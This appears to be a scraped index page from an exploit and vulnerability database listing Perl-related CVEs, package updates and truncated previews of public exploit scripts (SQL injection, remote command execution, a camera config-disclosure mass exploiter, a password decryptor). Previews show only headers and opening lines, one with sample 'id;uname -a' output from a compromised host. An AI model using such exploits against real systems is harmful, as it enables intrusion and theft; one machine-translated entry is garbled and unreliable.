CVE-2019-9891

The function getoptsimple as described in Advanced Bash Scripting Guide ISBN 978-1435752184 allows privilege escalation and execution of commands when used in a shell script called, for example, via sudo...

new packages: perl-Getopt-Long

An update is available for perl-Getopt-Long. This update affects Rocky Linux 9. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list For detailed information on changes in this release, see the Rocky...

CVE-2021-21907

Garrett Metal Detectors iC Module CMA CMA Version 5.0 has a directory traversal vulnerability in the CMA CLI getenv command. An authenticated remote user can supply a key that reads files under /ltrx_user/env/, potentially exposing sensitive data via local file inclusion. The TALOS description no...

PLANEX CS-QP50F-ING2 Remote Configuration Disclosure Vulnerability

PLANEX CS-QP50F-ING2 security surveillance smart camera remote configuration disclosure exploit. !/usr/bin/perl PLANEX CS-QP50F-ING2 Security Surveillance Smart Camera Remote Configuration Disclosure - Mass Exploiter Copyright 2021 c Todor Donev https://donev.eu/ Disclaimer: This or previous...

new module: perl:5.30

An update is available for perl-Pod-Perldoc, perl-DBI, perl-Pod-Escapes, perl-Devel-PPPort, perl-Pod-Usage, perl-Sub-Exporter, perl-perlfaq, perl-Object-HashBase, perl-CPAN-Meta-YAML, perl-Digest, perl-podlators, perl-bignum, perl-Text-ParseWords, perl-Text-Template, perl-DBD-MySQL, perl-Text-Glo...

Cgiemail 1.6 - Source Code Disclosure

!/usr/bin/env perl Exploit Title: cgiemail local file inclusion Vendor Homepage: http://web.mit.edu/wwwdev/cgiemail/webmaster.html Software Link: http://web.mit.edu/wwwdev/cgiemail/cgiemail-1.6.tar.gz Version: 1.6 and older Date: 2016-09-27 cgiecho a script included with cgiemail will return any...

JCraft / JSch Java Secure Channel 0.1.53 - Recursive sftp-get Directory Traversal

Exploit for windows platform in category dos / poc Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725 Version: 0.3 Date: Aug 31st, 2016 Complete Proof of Concept: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-5725...

Ovidentia Widgets 1.0.61 - Remote Command Execution

Title: Ovidentia Widgets 1.0.61 Remote Command Execution Exploit Author: bd0rk eMail: bd0rkathackermail.com Twitter: twitter.com/bd0rk Tested on: Ubuntu-Linux Download:...

About. git/config file leaked use-vulnerability warning-the black bar safety net

The beginning is also from the dark clouds that have such a vulnerability, many do not understand the might see on will feel a little confused, in fact, this vulnerability and svn leakage there is so little similar, can also according to the configuration file to restore the entire project proces...

Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print \n; print \n; print Joomla Component Joo!BB Blind SQL Injection Exploit \n; print Author:His0k4 ALGERIAN HaCkeR \n; print \n; print Conctact: His0k4.hlmatgamil.com \n; print Greetz: All friends...

webSPELL <= 4.01.02 (topic) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV2 print \n \'/ ; print \n -.- ; print \n -------------------oOO------OOo-------------------; print \n | webSPELL = v4.01.02 topic Remote SQL Injection |; print \n | coded by DNX |; print \n...

ea-gBook 0.1 - Remote Command Execution with RFI (c99) Exploit

No description provided by source. !/usr/bin/perl ea-gBook 0.1 Remote Command Execution with RFI c99 Exploit Vendor: http://ea-style.de/ Download: http://ea-style.de/eddy/index.php?action=downgbookagb Author: bd0rk Contact: bd0rkathackermail.com site: http://www.soh-crew.it.tt thanks Joss for the...

Ultrastats <= 0.2.142 (players-detail.php) Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; ! Discovered.: DNX ! Vendor.....: http://www.shooter-szene.de | http://www.ultrastats.org ! Detected...: 29.06.2008 ! Reported...: 04.07.2008 ! Response...: xx.xx.2008 ! Background.: UltraStats is a very...

Joomla Component n-forms 1.01 - Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print \n; print \n; print Mambot Component n-forms Blind SQL Injection Exploit \n; print Author:The Moorish :D \n; print Greetz:Team-dz,His0k4,x.CJP.x,Kader11000,c02,piRAte DIgitAL\n; print...

Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/10446/info Firebird is reported prone to a remote buffer-overrun vulnerability. The issue occurs because the application fails to perform sufficient boundary checks when the database server is handling database names. A...

vKios <= 2.0.0 (products.php cat) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl Indonesian Newhack Security Advisory ------------------------------------ vKios = 2.0.0 products.php cat Remote SQL Injection Exploit Waktu : Feb 8 2008 10:00PM Software : vKios Versi : = 2.0.0 Vendor : http://www.vkios.com/...

CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit

No description provided by source. !/usr/bin/perl cijfer-cnxpl - CuteNews =1.4.1 Remote Command Execution Copyright c 2005 cijfer [email protected] All rights reserved. 1. example cijfer@kalma:/research$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news [email protected] /$ id;uname -a uid=48apache...

Ultimate PHP Board <= 1.9.6 GOLD users.dat Password Decryptor

No description provided by source. !/usr/bin/perl Passwords Decrypter for UPB = 1.9.6 Related advisory: http://www.securityfocus.com/archive/1/402461/30/0/threaded Discovered and Coded by Alberto Trivero Password file is located at: http://www.example.com/upb/db/users.dat /str0ke use Getopt::Std;...

Pars4U Videosharing 1.0 - XSS / Remote Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if!$ARGV1 print \n; print VIVA ISLAME VIVA ISLAME \n; print VIVA ISLAME VIVA ISLAME \n; print \n; print Pars4u Videosharing V1 Blind SQL Injection Exploit \n; print \n; print categoriesportal.php catid \n; pri...

ezDatabase <= 2.0 (db_id) Remote Command Execution Exploit

No description provided by source. !/usr/bin/perl ezDatabase Remote Command Execution Exploit based on advisory by Pridels Team Copyright c 2006 cijfer cijfer@netti!fi All rights reserved. never ctrl+c again. cijfer$ http://target.com/dir host changed to 'http://target.com/dir' cijfer$ $Id:...